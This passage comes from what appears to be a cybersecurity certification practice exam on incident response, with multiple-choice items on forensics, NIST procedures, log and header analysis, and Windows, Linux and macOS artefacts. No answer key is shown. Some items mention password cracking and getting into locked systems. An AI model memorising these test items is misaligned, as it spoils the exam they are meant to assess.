AutoRestartShell              REG_DWORD  0x00000001 (1)
Background                    REG_SZ     0 0 0
CachedLogonsCount             REG_SZ     10
DebugServerCommand            REG_SZ     no
DefaultDomainName             REG_SZ
DefaultUserName               REG_SZ     admin
DisableBackButton             REG_DWORD  0x00000001 (1)
DisableCad                    REG_DWORD  0x00000001 (1)
EnableFirstLogonAnimation     REG_DWORD  0x00000001 (1)
EnableSIHostIntegration       REG_DWORD  0x00000001 (1)
ForceUnlockLogon              REG_DWORD  0x00000000 (0)
LastLogOffEndTimePerfCounter  REG_QWORD  0xde16d1a837 (953865578551)
LegalNoticeCaption            REG_SZ
LegalNoticeText               REG_SZ
PasswordExpiryWarning         REG_DWORD  0x00000005 (5)
PowerdownAfterShutdown        REG_SZ     0
PreCreateKnownFolders         REG_SZ     {A520A1A4-1780-4FF6-BD18-167343C5AF16}
ReportBootOk                  REG_SZ     1
scremoveoption                REG_SZ     0
Shell                         REG_SZ     explorer.exe
ShellCritical                 REG_DWORD  0x00000000 (0)
ShellInfrastructure           REG_SZ     sihost.exe
ShutdownFlags                 REG_DWORD  0x00000087 (135)
ShutdownWithoutLogon          REG_SZ     0
SiHostCritical                REG_DWORD  0x00000000 (0)
SiHostReadyTimeOut            REG_DWORD  0x00000000 (0)
SiHostRestartCountLimit       REG_DWORD  0x00000000 (0)
SiHostRestartTimeGap          REG_DWORD  0x00000000 (0)
Userinit                      REG_SZ     C:\Windows\system32\userinit.exe,
VMApplet                      REG_SZ     SystemPropertiesPerformance.exe /pagefile
WinStationsDisabled           REG_SZ     0

A. Admin, administrator
B. No domain, admin
C. Legal, admin
D. Corporate, no default username

41. Lauren wants to ensure that the two most commonly used methods for preventing Linux
buffer overflow attacks are enabled for the operating system she is installing on her
servers. What two related technologies should she investigate to help protect her systems?

A. The NX bit and ASLR
B. StackAntismash and DEP
C. Position-independent variables and ASLR
D. DEP and the position-independent variables


42. Angela is attempting to determine when a user account was created on a Windows 10
workstation. What method is her best option if she believes the account was created
recently?

A. Check the System log.
B. Check the user profile creation date.
C. Check the Security log.
D. Query the registry for the user ID creation date.

43. Alex suspects that an attacker has modified a Linux executable using static libraries.
Which of the following Linux commands is best suited to determining whether this has
occurred?

A. file
B. stat
C. strings
D. grep

44. Lauren wants to detect administrative account abuse on a Windows server that she is
responsible for. What type of auditing permissions should she enable to determine whether
users with administrative rights are making changes?

A. Success
B. Fail
C. Full control
D. All

45. Cameron believes that the Ubuntu Linux system that he is restoring to service has already
been fully updated. What command can he use to check for new updates, and where can
he check for the history of updates on his system?

A. apt-get -u upgrade, /var/log/apt
B. rpm -i upgrade, /var/log/rpm
C. upgrade -l, /var/log/upgrades
D. apt-get install -u; Ubuntu Linux does not provide a history of updates

46. Adam wants to quickly crack passwords from a Windows 7 system. Which of the
following tools will provide the fastest results in most circumstances?

A. John the Ripper
B. Cain and Abel
C. Ophcrack
D. Hashcat


152   Chapter 3 - Domain 3: Cyber Incident Response


47. Because of external factors, Eric has only a limited time period to collect an image from
a workstation. If he collects only specific files of interest, what type of acquisition has he
performed?

A. Logical
B. Bit-by-bit
C. Sparse
D. None of the above


48. Kelly sees high CPU utilization in the Windows Task Manager, as shown here, while
reviewing a system’s performance issues. If she wants to get a detailed view of the CPU
usage by application, with PIDs and average CPU usage, what native Windows tool can
she use to gather that detail?

CPU   Intel(R) Core(TM) i7-3770K CPU @ 3.50GHz
% Utilization over 60 seconds (scale 0 to 100%)
[utilization graph]
Utilization   Speed        Maximum speed: 3.50 GHz
14%           3.57 GHz     Sockets: 1
                           Cores: 4
Processes  Threads  Handles   Logical processors: 8
240        3037     113829    Virtualization: Enabled
                              L1 cache: 256 KB
Up time                       L2 cache: 1.0 MB
6:00:33:18                    L3 cache: 8.0 MB

A. Resource Monitor
B. Task Manager
C. iperf
D. Perfmon


49. During a forensic investigation, Steve records information about each drive, including
where it was acquired, who made the forensic copy, the MD5 hash of the drive, and other
details. What term describes the process Steve is using as he labels evidence with details of
who acquired and validated it?

A. Direct evidence
B. Circumstantial evidence
C. Incident logging
D. Chain of custody
50. Roger’s SolarWinds monitoring system provides Windows memory utilization reporting.
Use the chart shown here to determine what actions Roger should take based on his
monitoring.

[Chart: Memory Capacity Forecast Chart for dev-aus-lali-02, Jan 22 2017, 4:33 am - Apr 22 2017, 12:00 pm.
Zoom: 1h 12h 24h. X-axis: 23 Jan through 17 Apr ’17.
Thresholds: RESOURCE WARNING >80%, CRITICAL >90%, AT CAPACITY >100%.
Forecast: Peak Trend reaches >80% in more than 1 year; Average Trend reaches >80% in more than 1 year.]

A. The memory usage is stable and can be left as it is.
B. The memory usage is high and must be addressed.
C. Roger should enable automatic memory management.
D. There is not enough information to make a decision.
51. NIST defines five major types of threat information types in NIST SP 800-150, “Guide to
Cyber Threat Information Sharing.”

1. Indicators, which are technical artifacts or observables that suggest an attack is
imminent, currently underway, or compromise may have already occurred
2. Tactics, techniques, and procedures that describe the behavior of an actor
3. Security alerts like advisories and bulletins
4. Threat intelligence reports that describe actors, systems, and information being
targeted and the methods being used
5. Tool configurations that support collection, exchange, analysis, and use of threat
information

Which of these should Frank seek out to help him best protect the midsize organization he
works for against unknown threats?

A. 1, 2, and 5
B. 1, 3, and 5
C. 2, 4, and 5
D. 1, 2, and 4
52. Alex wants to determine whether the user of a company-owned laptop accessed a
malicious wireless access point. Where can he find the list of wireless networks that the
system knows about?

A. The registry
B. The user profile directory
C. The wireless adapter cache
D. Wireless network lists are not stored after use.

53. Fred wants to prevent buffer overflows from succeeding against his organization’s web
applications. What technique is best suited to preventing this type of attack from succeeding?

A. User input canonicalization
B. User input size checking
C. Format string validation
D. Buffer overwriting

54. Susan needs to perform forensics on a virtual machine. What process should she use to
ensure she gets all of the forensic data she may need?

A. Suspend the machine and copy the contents of the directory it resides in.
B. Perform a live image of the machine.
C. Suspend the machine and make a forensic copy of the drive it resides on.
D. Turn the virtual machine off and make a forensic copy of it.

55. Allison wants to access Chrome logs as part of a forensic investigation. What format is
information about cookies, history, and saved form fill information saved in?

A. SQLite
B. Plain text
C. Base64 encoded text
D. NoSQL


56. While Chris is attempting to image a device, he encounters write issues and cannot write
the image as currently set. What issue is he most likely encountering?

[Imaging dialog shown:]
Image Destination Folder: [                    ] [Browse]
Image Filename (Excluding Extension): CSAplus_image01
Image Fragment Size (MB): 0
For Raw, E01, and AFF formats: 0 = do not fragment
Compression (0=None, 1=Fastest, ... 9=Smallest): 0
Use AD Encryption: [ ]

A. The files need to be compressed.
B. The destination drive is formatted FAT32.
C. The destination drive is formatted NTFS.
D. The files are encrypted.

57. Christina is configuring her SolarWinds alerts for rogue devices and wants to select an
appropriate reset condition for rogue MAC address alerts. Which of the options shown
here is best suited to handling rogue devices if she wants to avoid creating additional work
for her team?

3. Reset Condition
When the reset condition is met the alert is removed from active alerts. » Learn more
Reset this alert when trigger condition is no longer true
Reset this alert automatically after [    ] minutes
No reset condition - Trigger this alert each time the trigger condition is met
No reset action - Manually remove the alert from the active alerts list
Create a special reset condition for this alert

A. Reset when no longer true.
B. Reset after a time period.
C. No reset condition; trigger each time condition is met.
D. No reset action; manually remove the alert from the active alerts list.

58. Fred needs to validate the MD5 checksum of a file on a Windows system but is not
allowed to install any programs and cannot run files from external media or drives. What
Windows utility can he use to get the MD5 hash of the file?

A. md5sum
B. certutil
C. sha1sum
D. hashcheck

59. Which of the following is not an important part of the incident response communication
process?

A. Limiting communication to trusted parties
B. Disclosure based on public feedback
C. Using a secure method of communication
D. Preventing accidental release of incident-related information
60. Alex is diagnosing major network issues at a large organization and sees the following
graph in her PRTG console on the “outside” interface of her border router. What can Alex
presume has occurred?

[Graph: Live Graph - 60 Minutes - 15 sec Interval, traffic in megabit/second]

A. The network link has failed.
B. A DDoS is in progress.
C. An internal system is transferring a large volume of data.
D. The network link has been restored.
61. Which of the following commands is not useful for determining the list of network 
interfaces on a Linux system? 
A. ifconfig 
B. netstat -i 
C. ip link show 
D. intf -q 


62. What Windows memory protection methodology is shown here?

[Diagram: memory layout of a process on first boot compared with second boot]

A. DEP
B. ASLR
C. StackProtect
D. MemShuffle

63. Forensic investigation shows that the target of the investigation used the Windows Quick
Format command to attempt to destroy evidence on a USB thumb drive. Which of the
NIST sanitization techniques has the target of the investigation used in their attempt to
conceal evidence?

A. Clear
B. Purge
C. Destroy
D. None of the above

64. Angela wants to use her network security device to detect potential beaconing behavior.
Which of the following options is best suited to detecting beaconing using her network
security device?

A. Antivirus definitions
B. File reputation
C. IP reputation
D. Static file analysis

65. During an incident response process Susan plugs a system back into the network,
allowing it normal network access. What phase of the incident response process is Susan
performing?

A. Preparation
B. Detection and analysis
C. Containment, eradication, and recovery
D. Post-incident activity

66. A server in the data center that Chris is responsible for monitoring unexpectedly connects
to an off-site IP address and transfers 9GB of data to the remote system. What type of
monitoring should Chris enable to best assist him in detecting future events of this type?

A. Flow logs with heuristic analysis
B. SNMP monitoring with heuristic analysis
C. Flow logs with signature based detection
D. SNMP monitoring with signature-based detection
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67. Jennifer’s team has completed the initial phases of their incident response process and is 
assessing the time required to recover from the incident. Using the NIST recoverability 
effort categories, the team has determined that they can predict the time to recover but 
will require additional resources. How should she categorize this using the NIST model? 


A. Regular
B. Supplemented
C. Extended
D. Not recoverable
68. Which of the following mobile device forensic techniques is not a valid method of isolation 
during forensic examination? 
A. Use a forensic SIM. 
B. Buy and use a forensic isolation appliance. 
C. Place the device in an antistatic bag. 
D. Put the device in airplane mode. 


69. Rick wants to monitor permissions and ownership changes of critical files on the Red Hat 
Linux system he is responsible for. What Linux tool can he use to do this? 


A. watchdog 
B. auditctl 
C. dirwatch 


D. monitord 


70. Janet is attempting to conceal her actions on a company-owned computer. As part of her 
cleanup attempts, she deletes all of the files she downloaded from a corporate file server 
using a browser in incognito mode. How can a forensic investigator determine what files 
she downloaded? 


A. Network flows 
B. SMB logs 
C. Browser cache 
D. Drive analysis 
71. Joe is aware that an attacker has compromised a system on his network but wants to
continue to observe the attacker’s efforts as they continue their attack. If Joe wants to
prevent additional impact on his network while watching what the attacker does, what
containment method should he use?

A. Removal
B. Isolation
C. Segmentation
D. Detection


72. When Charles arrived at work this morning, he found an email in his inbox that read,
“Your systems are weak; we will own your network by the end of the week.” How
would he categorize this sign of a potential incident if he was using the NIST SP 800-61
descriptions of incident signs?

A. An indicator
B. A threat
C. A risk
D. A precursor

73. During an incident response process, Cynthia conducts a lessons-learned review. What
phase of the incident response process is she in?

A. Preparation
B. Detection and analysis
C. Containment, eradication, and recovery
D. Post-incident recovery

74. As part of his incident response program, Allan is designing a playbook for zero-day
threats. Which of the following should not be in his plan to handle them?

A. Segmentation
B. Patching
C. Using threat intelligence
D. Whitelisting

75. As the CISO of her organization, Jennifer is working on an incident classification scheme
and wants to base her design on NIST’s definitions. Which of the following options should
she use to best describe a user accessing a file that they are not authorized to view?

A. An incident
B. An event
C. An adverse event
D. A security incident

76. Fred wants to identify digital evidence that can place an individual in a specific place at a
specific time. Which of the following types of digital forensic data is not commonly used
to attempt to document physical location at specific times?

A. Cell phone GPS logs
B. Photograph metadata
C. Cell phone tower logs
D. Microsoft Office document metadata

77. Cynthia has completed the validation process of her media sanitization efforts and has
checked a sample of the drives she had purged using a built-in cryptographic wipe utility.
What is her next step?

A. Resample to validate her testing.
B. Destroy the drives.
C. Documentation
D. She is done and can send the drives on for disposition.

78. In his role as a small company’s information security manager, Mike has a limited budget
for hiring permanent staff. While his team can handle simple virus infections, he does
not currently have a way to handle significant information security incidents. Which of
the following options should Mike investigate to ensure that his company is prepared for
security incidents?

A. Outsource to a third-party SOC.
B. Create an internal SOC.
C. Hire an internal incident response team.
D. Outsource to an incident response provider.

79. The Stuxnet attack relied on engineers who transported malware with them, crossing
the air gap between networks. What type of threat is most likely to cross an air-gapped
network?

A. Email
B. Web
C. Removable media
D. Attrition

80. While reviewing his network for rogue devices, Dan notes that a system with MAC
address D4:BE:D9:E5:F9:18 has been connected to a switch in one of the offices in his
building for three days. What information can this provide Dan that may be helpful if he
conducts a physical survey of the office?

A. The operating system of the device
B. The user of the system
C. The vendor who built the system
D. The type of device that is connected

81. Frank wants to ensure that media has been properly sanitized. Which of the following
options properly lists sanitization descriptions from least to most effective?

A. Purge, clear, destroy
B. Eliminate, eradicate, destroy
C. Clear, purge, destroy
D. Eradicate, eliminate, destroy
82. Degaussing is an example of what form of media sanitization?

A. Clearing
B. Purging
C. Destruction
D. It is not a form of media sanitization.


83. While reviewing storage usage on a Windows system, Brian checks the volume shadow
copy storage as shown here:

C:\WINDOWS\system32>vssadmin list shadowstorage
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.

Shadow Copy Storage association
   For volume: (C:)\\?\Volume{c3b53dae-0e54-13e3-97ab-806e6f6e6963}\
   Shadow Copy Storage volume: (C:)\\?\Volume{c3b53dae-0e54-13e3-97ab-806e6f6e6963}\
   Used Shadow Copy Storage space: 25.6 GB (2%)
   Allocated Shadow Copy Storage space: 26.0 GB (2%)
   Maximum Shadow Copy Storage space: 89.4 GB (10%)

What purpose does this storage serve, and can he safely delete it?

A. It provides a block-level snapshot and can be safely deleted.
B. It provides secure hidden storage and can be safely deleted.
C. It provides secure hidden storage and cannot be safely deleted.
D. It provides a block-level snapshot and cannot be safely deleted.
84. Near the end of a typical business day, Danielle is notified that her organization’s email
servers have been blacklisted because of email that appears to originate from her domain.
What information does she need to start investigating the source of the spam emails?

A. Firewall logs showing SMTP connections
B. The SMTP audit log from her email server
C. The full headers of one of the spam messages
D. Network flows for her network

85. Lauren recovers a number of 16GB and 32GB microSD cards during a forensic
investigation. Without checking them manually, what filesystem type is she most likely to
find them formatted in as if they were used with a digital camera?

A. RAW
B. FAT16
C. FAT32
D. HFS+
86. While checking for bandwidth consumption issues, Alex uses the ifconfig command on
the Linux box that he is reviewing. He sees that the device has sent less than 4Gb of data,
but his network flow logs show that the system has sent over 20Gb. What problem has
Alex encountered?

A. A rootkit is concealing traffic from the Linux kernel.
B. Flow logs show traffic that does not reach the system.
C. ifconfig resets traffic counters at 4Gb.
D. ifconfig only samples outbound traffic and will not provide accurate information.

87. After arriving at an investigation site, Brian determines that three powered-on computers
need to be taken for forensic examination. What steps should he take before removing
the PCs?

A. Power them down, take pictures of how each is connected, and log each system in as
evidence.
B. Take photos of each system, power them down, and attach a tamper-evident seal to
each PC.
C. Collect live forensic information, take photos of each system, and power them down.
D. Collect a static drive image, validate the hash of the image, and securely transport
each system.

88. In his role as a forensic examiner, Lucas has been asked to produce forensic evidence
related to a civil case. What is this process called?

A. Criminal forensics
B. E-discovery
C. Cyber production
D. Civil tort

89. During their organization’s incident response preparation, Charles and Linda are
identifying critical information assets that the company uses. Included in their
organizational data sets is a list of customer names, addresses, phone numbers, and
demographic information. How should Charles and Linda classify this information?

A. PII
B. Intellectual property
C. PHI
D. PCI-DSS

90. As Lauren studies her company’s computer forensics playbook, she notices that forensic
investigators are required to use a chain of custody form. What information would she
record on that form if she was conducting a forensic investigation?

A. The list of individuals who made contact with files leading to the investigation
B. The list of former owners or operators of the PC involved in the investigation
C. All individuals who work with evidence in the investigation
D. The police officers who take possession of the evidence


91. Scott needs to ensure that the system he just rebuilt after an incident is secure. Which type
of scan will provide him with the most useful information to meet his goal?

A. An authenticated vulnerability scan from a trusted internal network
B. An unauthenticated vulnerability scan from a trusted internal network
C. An authenticated scan from an untrusted external network
D. An unauthenticated scan from an untrusted external network

92. What is the primary role of management in the incident response process?

A. Leading the CSIRT
B. Acting as the primary interface with law enforcement
C. Providing authority and resources
D. Assessing impact on stakeholders

93. While reviewing his OSSEC SIEM logs, Chris notices the following entries. What should
his next action be if he wants to quickly identify the new user’s creation date and time?

1 22:45:35 [OSSEC] New group added to the system 5901
1 22:45:35 [OSSEC] New user added to the system 5902

A. Check the user.log for a new user.
B. Check syslog for a new user.
C. Check /etc/passwd for a new user.
D. Check auth.log for a new user.

94. Jessica wants to track the changes made to the registry and filesystem while running a
suspect executable on a Windows system. Which Sysinternals tool will allow her to do
this?

A. App Monitor
B. Resource Tracker
C. Process Monitor
D. There is not a Sysinternals tool with this capability.

95. Frank wants to improve the effectiveness of the incident analysis process he is responsible
for as the leader of his organization’s CSIRT. Which of the following is not a commonly
recommended best practice based on NIST’s guidelines?

A. Profile networks and systems to measure the characteristics of expected activity.
B. Perform event correlation to combine information from multiple sources.
C. Maintain backups of every system and device.
D. Capture network traffic as soon as an incident is suspected.
96. NIST describes four major phases in the incident response cycle. Which of the following is
not one of the four? 


A. Containment, eradication, and recovery 
B. Notification and communication 
C. Detection and analysis 
D. Preparation 
97. Charles wants to perform memory forensics on a Windows system and wants to access pagefile.sys. When he attempts to copy it, he receives the following error. What access method is required to access the page file?

    The action can't be completed because the file is open in another program
    Close the file and try again.

    pagefile.sys
    Date created: 8/26/2013 12:08 PM
    Size: 16.0 GB

    [Try Again]    [More details]

A. Run Windows Explorer as an administrator and repeat the copy.
B. Open the file using fmem.
C. Run cmd.exe as an administrator and repeat the copy.
D. Shut the system down, remove the drive, and copy it from another system.


98. Chris wants to prevent evil twin attacks from working on his wireless network. Which of 
the following is not a useful method for detecting evil twins? 


A. Check for BSSID. 
B. Check the SSID. 
C. Check the attributes (channel, cipher, authentication method). 


D. Check for tagged parameters like the organizational unique identifier. 


99. Where is slack space found in the following Windows partition map?

    [Disk Management partition map: System Reserved, 100 MB NTFS, Online, Healthy (System, Active, Primary Partition) | (C:) 893.71 GB NTFS, Healthy (Boot, Page File, Crash Dump, Primary Partition) | Unallocated]

A. The System Reserved partition
B. The System Reserved and Unallocated partitions
C. The System Reserved and C: partitions
D. The C: and unallocated partitions


100. Luke needs to verify settings on a macOS computer to ensure that the configuration items he expects are set properly. What type of file is commonly used to store configuration settings for macOS systems?

A. The registry
B. .profile files
C. Plists
D. .config files

101. Adam needs to determine the proper retention policy for his organization’s incident data. If he wants to follow common industry practices and does not have specific legal or contractual obligations that he needs to meet, what time frame should he select?

A. 30 days
B. 90 days
C. 1 to 2 years
D. 7 years

102. The system that Alice has identified as the source of beaconing traffic is one of her organization’s critical e-commerce servers. To maintain her organization’s operations, she needs to quickly restore the server to its original, uncompromised state. Which criterion is most likely to be affected by this action?

A. Damage to the system or service
B. Service availability
C. Ability to preserve evidence
D. Time and resources needed to implement the strategy

103. After law enforcement was called because of potential criminal activity discovered as part of a forensic investigation, the officers on the scene seized three servers. When can Joe expect his servers to be returned?

A. After 30 days, which provides enough time for a reasonable imaging process.
B. After 6 months, as required by law.
C. After 1 year, as most cases resolve in that amount of time.
D. Joe should not plan on a time frame for return.

104. Lauren wants to create a forensic image that third-party investigators can use but does not know what tool the third-party investigation team that her company intends to engage will use. Which of the following forensic formats should she choose if she wants almost any forensic tool to be able to access the image?

A. E01
B. AFF
C. RAW
D. AD1
105. After Janet’s attempts to conceal her downloads of important corporate information were discovered, forensic investigators learned that she frequently copied work files to a USB drive. Which of the following is not a possible way to manually check her Windows workstation for a list of previously connected USB drives?

A. Check the security audit logs.
B. Check the setupapi log file.
C. Search the registry.
D. Check the user’s profile.

106. As part of his forensic investigation, Scott intends to make a forensic image of a network share that is mounted by the PC that is the focus of his investigation. What information will he be unable to capture?

A. File creation dates
B. Deleted files
C. File permission data
D. File metadata

107. NIST SP 800-61 identifies six outside parties that an incident response team will typically communicate with. Which of the following is not one of those parties?

A. Customers, constituents, and media
B. Internet service providers
C. Law enforcement agencies
D. Legal counsel

108. What common incident response follow-up activity includes asking questions like “What additional tools or resources are needed to detect or analyze future events?”

A. Preparation
B. Lessons-learned review
C. Evidence gathering
D. Procedural analysis

109. Susan has been asked to capture forensic data from a Windows PC and needs to ensure that she captures the data in their order of volatility. Which order is correct from most volatile to least volatile?

A. Network traffic, CPU cache, disk drives, optical media
B. CPU cache, network traffic, disk drives, optical media
C. Optical media, disk drives, network traffic, CPU cache
D. Network traffic, CPU cache, optical media, disk drives

110. During an incident response process, Susan heads to a compromised system and pulls its network cable. What phase of the incident response process is Susan performing?

A. Preparation
B. Detection and analysis
C. Containment, eradication, and recovery
D. Post-incident activity

111. Scott needs to verify that the forensic image he has created is an exact duplicate of the original drive. Which of the following methods is considered forensically sound?

A. Create a MD5 hash
B. Create a SHA-1 hash
C. Create a SHA-2 hash
D. All of the above

112. What strategy does NIST suggest for identifying attackers during an incident response process?

A. Use geographic IP tracking to identify the attacker’s location.
B. Contact upstream ISPs for assistance in tracking down the attacker.
C. Contact local law enforcement so that they can use law enforcement-specific tools.
D. Identifying attackers is not an important part of the incident response process.

113. Rick is conducting a forensic investigation of a compromised system. He knows from user reports that issues started at approximately 3:30 p.m. on June 12. Using the SANS SIFT open source forensic tool, what process should he use to determine what occurred?

A. Search the drive for all files that were changed between 3 and 4 p.m.
B. Create a Super Timeline.
C. Run anti-malware and search for newly installed malware tools during that time frame.
D. Search system logs for events between 3 and 4 p.m.

114. Charles believes that an attacker may have added accounts and attempted to obtain extra rights on a Linux workstation. Which of the following is not a common way to check for unexpected accounts like this?

A. Review /etc/passwd and /etc/shadow for unexpected accounts.
B. Check /home/ for new user directories.
C. Review /etc/sudoers for unexpected accounts.
D. Check /etc/groups for group membership issues.

115. Ben wants to coordinate with other organizations in the information security community to share data and current events as well as warnings of new security issues. What type of organization should he join?

A. An ISAC
B. A CSIRT
C. A VPAC
D. An IRT


168 Chapter 3: Domain 3: Cyber Incident Response


116. While investigating a spam email, Adam is able to capture headers from one of the email messages that was received. He notes that the sender was Carmen Victoria Garci. What facts can he gather from the headers shown here?

    ARC-Authentication-Results: i=1; mx.google.com;
        spf=pass (google.com: domain of www.@coral.ocn.ne.jp designates 153.149.233.2 as permitted sender) smtp.mailfrom=www.@coral.ocn.ne.jp
    Return-Path: <www.@coral.ocn.ne.jp>
    Received: from mbkd0201.ocn.ad.jp (mbkd0201.ocn.ad.jp. [153.149.233.2])
        by mx.google.com with ESMTP id di3sil5760624pin.176.2017.07.04.09.39.08;
        Tue, 04 Jul 2017 09:39:20 -0700 (PDT)
    Received-SPF: pass (google.com: domain of www.@coral.ocn.ne.jp designates 153.149.233.2 as permitted sender) client-ip=153.149.233.2;
    Authentication-Results: mx.google.com;
        spf=pass (google.com: domain of www.@coral.ocn.ne.jp designates 153.149.233.2 as permitted sender) smtp.mailfrom=www.@coral.ocn.ne.jp
    Received: from mf-smf-ucb011.ocn.ad.jp (mf-smf-ucb011.ocn.ad.jp [153.149.228.228]) by mbkd0201.ocn.ad.jp (Postfix) with ESMTP id DEE6B300D37; Wed, 5 Jul 2017 01:38:39 +0900 (JST)
    Received: from mf-smf-ucb011.ocn.ad.jp (mf-smf-ucb011 [153.149.228.228]) by mf-smf-ucb011.ocn.ad.jp (Postfix) with ESMTP id Ci6C&90022E; Wed, 5 Jul 2017 01:38:39 +0900 (JST)
    Received: from ntt.pod01.mv-mta-ucb019 (mv-mta-ucb019.ocn.ad.jp [153.149.142.82]) by mf-smf-ucb011.ocn.ad.jp (Switch-3.3.4/Switch-3.3.4) with ESMTP id v64GcHjL065317; Wed, 5 Jul 2017 01:38:35 +0900
    Received: from vcwebmail.ocn.ad.jp ([153.149.227.133]) by ntt.pod01.mv-mta-ucb019 with id ggebivO0l2tKTyHOigebsV; Tue, 04 Jul 2017 16:38:35 +0000
    Received: from mzcstore24l.ocn.ad.jp (mz-fcb24ip.ocn.ad.jp [180.8.112.196]) by vcwebmail.ocn.ad.jp (Postfix) with ESMTP; Wed, 5 Jul 2017 01:38:35 +0900 (JST)
    Date: Wed, 5 Jul 2017 01:38:35 +0900 (JST)
    From: Carmen Victoria Garci <"www."@coral.ocn.ne.jp>
    Reply-To: Carmen Victoria Garci <tntexpress819@yahoo.com>
    Message-ID: <2041845944.77592137.1499186315187.JavaMail.root@coral.ocn.ne.jp>
    Subject: ATTENTION;THE OWNER OF THIS EMAIL,
    MIME-Version: 1.0
    Content-Type: text/plain; charset=ISO-2022-JP
    Content-Transfer-Encoding: 7bit
    X-Originating-IP: [197.234.219.24]

A. Victoria Garci’s email address is tntexpress819@yahoo.com.
B. The sender sent via Yahoo.
C. The sender sent via a system in Japan.
D. The sender sent via Gmail.


117. Lauren needs to access a macOS system but does not have the user’s password. If the sys- 
tem is not FileVaulted, which of the following options is not a valid recovery method? 


A. Use Single User mode to reset the password. 
B. Use Recovery mode to recover the password. 
C. Use Target Disk mode to delete the Keychain. 


D. Reset the password from another privileged user account. 


118. While performing forensic analysis of an iPhone backup, Cynthia discovers that she has 
only some of the information that she expects the phone to contain. What is the most 
likely scenario that would result in the backup she is using having partial information? 


A. The backup was interrupted. 

B. The backup is encrypted. 

C. The backup is a differential backup. 
D. The backup is stored in iCloud. 


119. Chris wants to ensure that his chain of custody documentation will stand up to examination in court. Which of the following options will provide him with the best documentary proof of his actions?

A. A second examiner acting as a witness and countersigning all actions
B. A complete forensic log book signed and sealed by a notary public
C. A documented forensic process with required sign-off
D. Taking pictures of all independent forensic actions




120. Cynthia is reviewing her organization’s incident response recovery process, which is outlined here. Which of the following recommendations should she make to ensure that further issues do not occur during the restoration process?

A. Change passwords before restoring from backup.
B. Isolate the system before restoring from backups.
C. Securely wipe the drive before restoration.
D. Vulnerability scan before patching.


121. After zero wiping a system’s hard drive and rebuilding it with all security patches and 
trusted accounts, Lauren is notified that the system is once again showing signs of compro- 
mise. Which of the following types of malware package cannot survive this type of eradi- 
cation effort? 


A. An MBR-resident malware tool 
B. A UEFI-resident malware 
C. A BIOS-resident malware 


D. A slack space-resident malware package 


122. Patents, copyrights, trademarks, and trade secrets are all related to what type of data? 
A. PII 
B. PHI 
C. Corporate confidential 


D. Intellectual property 


123. Which of the following issues is not commonly associated with BYOD devices? 
A. Increased network utilization 
B. Increased device costs 
C. Increased support tickets 


D. Increased security risk 
124. Saria is reviewing the contents of a drive as part of a forensic effort and notes that the file she is reviewing takes up more space on the disk than its actual size, as shown here. What has she discovered?

    [example2.txt Properties dialog, General tab: Text Document (.txt), opens with Notepad;
     Size: 161 KB (164,912 bytes); Size on disk: 168 KB (172,032 bytes);
     Created/Modified/Accessed: Today, July 03, 2017; Attributes: [ ] Read-only [ ] Hidden]

A. Slack space
B. Hidden content
C. Sparse files
D. Encryption overhead

125. What is the minimum retention period for incident data for U.S. federal government agencies?

A. 90 days
B. 1 year
C. 3 years
D. 7 years
126. Kathleen is restoring a critical business system to operation after a major compromise and needs to validate that the operating system and application files are legitimate and do not have any malicious code included in them. What type of tool should she use to validate this?

A. A trusted system binary kit
B. Dynamic code analysis
C. Static code analysis
D. File rainbow tables

127. Charles wants to verify that authentication to a Linux service has two-factor authentication settings set as a requirement. Which common Linux directory can he check for this type of setting, listed by application, if the application supports it?

A. /etc/pam.d
B. /etc/passwd
C. /etc/auth.d
D. /etc/tfa

128. Charles is creating the evidence log for a computer that was part of an attack on an external third-party system. What network-related information should he include in that log if he wants to follow NIST’s recommendations?

A. Subnet mask, DHCP server, hostname, MAC address
B. IP addresses, MAC addresses, host name
C. Domain, hostname, MAC addresses, IP addresses
D. NIC manufacturer, MAC addresses, IP addresses, DHCP configuration

129. Chris believes that systems on his network have been compromised by an advanced persistent threat actor. He has observed a number of large file transfers outbound to remote sites via TLS-protected HTTP sessions from systems that do not typically send data to those locations. Which of the following techniques is most likely to detect the APT infections?

A. Network traffic analysis
B. Network forensics
C. Endpoint behavior analysis
D. Endpoint forensics
130. After submitting a suspected malware package to VirusTotal, Alex receives the following results. What does this tell Alex?

    SHA256:          027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745
    File name:       027cc450ef5f8c5f653329641ec1fed9.exe
    Detection ratio: 55/62
    Analysis date:   2017-07-05 15:10:30 UTC ( 54 minutes ago )

    Antivirus       Result                        Update
    Ad-Aware        Trojan.Ransom.GoldenEye.B     20170705
    AegisLab        Troj.Ransom.W32!c             20170705
    AhnLab-V3       Trojan/Win32.Petya.R203323    20170705
    ALYac           Trojan.Ransom.Petya           20170705
    Antiy-AVL       Trojan/Win32.SGeneric         20170705
    Arcabit         Trojan.Ransom.GoldenEye.B     20170705
    Avast           MBR:Ransom-C [Trj]            20170705

A. The submitted file contains more than one malware package.
B. Antivirus vendors use different names for the same malware.
C. VirusTotal was unable to specifically identify the malware.
D. The malware package is polymorphic, and matches will be incorrect.

131. Ben is investigating a potential malware infection of a laptop belonging to a senior manager in the company he works for. When the manager opens a document, website, or other application that takes user input, words start to appear as though they are being typed. What is the first step that Ben should take in his investigation?

A. Run an antivirus scan.
B. Disconnect the system from the network.
C. Wipe the system and reinstall.
D. Observe and record what is being typed.


132. Kathleen’s forensic analysis of a laptop that is believed to have been used to access sensitive corporate data shows that the suspect tried to overwrite the data they downloaded as part of antiforensic activities by deleting the original files and then copying other files to the drive. Where is Kathleen most likely to find evidence of the original files?

A. The MBR
B. Unallocated space
C. Slack space
D. The FAT

133. As part of a test of her network’s monitoring infrastructure, Kelly uses snmpwalk to validate her router SNMP settings. She executes snmpwalk as shown here:

    snmpwalk -c public 10.1.10.1 -v1

    iso.3.6.1.2.1.1.0 = STRING: "RouterOS 3.6"
    iso.3.6.1.2.1.2.0 = OID: iso.3.6.1.4.1.30800
    iso.3.6.1.2.1.1.3.0 = Timeticks: (1927523) 08:09:11
    iso.3.6.1.2.1.1.4.0 = STRING: "root"
    iso.3.6.1.2.1.1.5.0 = STRING: "RouterOS"

Which of the following pieces of information is not something she can discover from this query?

A. SNMP v1 is enabled.
B. The community string is public.
C. The community string is root.
D. The contact name is root.

134. Laura needs to check on memory, CPU, disk, network, and power usage on a Mac. What GUI tool can she use to check these?

A. Resource Monitor
B. System Monitor
C. Activity Monitor
D. Sysradar

135. Angela wants to access the decryption key for a BitLocker-encrypted system, but the system is currently turned off. Which of the following methods is a viable method if a Windows system is turned off?

A. Hibernation file analysis
